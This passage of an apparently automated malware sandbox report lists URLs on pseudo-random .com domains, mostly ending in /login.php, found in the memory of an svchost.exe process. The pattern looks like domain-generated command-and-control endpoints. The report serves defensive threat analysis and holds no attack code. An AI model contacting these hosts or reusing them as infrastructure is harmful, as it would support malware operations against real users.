Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyxyxyd.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pufybop.com/login.php
Source: svchost.exe, 00000002.00000003.2194039895.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557475743.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3344516796.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577719348.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404003407.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548810720.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402591277.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578793071.0000000008786000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pufybyv.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384383810.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pufycog.com/login.php
Source: svchost.exe, 00000002.00000003.2194039895.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3342879951.0000000005815000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393602354.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513112023.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pufydep.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336766554.0000000003353000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pufydul.com/login.php
Source: svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582641786.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pufygav.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246274264.000000000870B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2768400966.0000000008705000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pufyjuq.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pufylap.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359008557.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354372156.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2745079929.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738837414.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352879533.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pufylul.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330154891.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328870829.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pufymyg.com/login.php
Source: svchost.exe, 00000002.00000003.2337642053.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338991462.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339128784.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338382961.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2628718282.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339275288.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635696281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338959183.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638579923.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pufypeg.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2745079929.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738837414.0000000008783000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pufytip.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321666596.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pufywil.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672088553.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738837414.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665740291.00000000087FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pufyxov.com/login.php
Source: svchost.exe, 00000002.00000003.2672088553.0000000008785000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pufyxov.com/login.phpcom/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296732942.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296551987.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301364243.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pufyxug.com/login.php
Source: svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296776136.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296803931.00000000086F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pujycov.com/login.php
Source: svchost.exe, 00000002.00000003.2672088553.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671484952.00000000086F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pujycyp.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3283281392.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2799131678.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3267123963.0000000003347000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2798176179.00000000058CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2800821291.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404003407.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384104652.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pujydap.com/login.php
Source: svchost.exe, 00000002.00000003.2337642053.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334498126.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334047161.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338382961.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337179930.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2640219450.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336661299.0000000003304000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334800958.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337435190.0000000008611000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610879120.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335316915.0000000008611000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pujygaq.com/login.php
Source: svchost.exe, 00000002.00000003.2772293102.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2783207555.00000000033AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2772917622.00000000033AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pujygug.com/http://pujygug.com/
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3284179552.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402132488.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3268596550.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246499612.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202773518.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3388007673.0000000000884000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402132488.0000000008646000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272090324.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513112023.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194197046.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194197284.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3302596386.000000000865D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202485680.00000000008A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pujygul.com/login.php
Source: svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334498126.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334047161.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337179930.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334800958.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pujyjup.com/login.php
Source: svchost.exe, 00000002.00000003.2321460609.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323657176.000000000866F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2320047859.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321082744.00000000086D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pujylog.com/
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321434222.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578065233.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321666596.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pujylog.com/login.php
Source: svchost.exe, 00000002.00000003.2709443016.00000000033AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670655678.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2673206249.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671925473.00000000033AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pujypal.com/http://vonyrot.com/H
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246499612.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3268596550.0000000008643000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402132488.0000000008646000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3284179552.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665740291.00000000087FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352879533.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pujypal.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2297525559.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296732942.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296191981.0000000000883000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301364243.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pujypup.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2554924248.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pujyteq.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748679025.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352879533.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pujytug.com/login.php
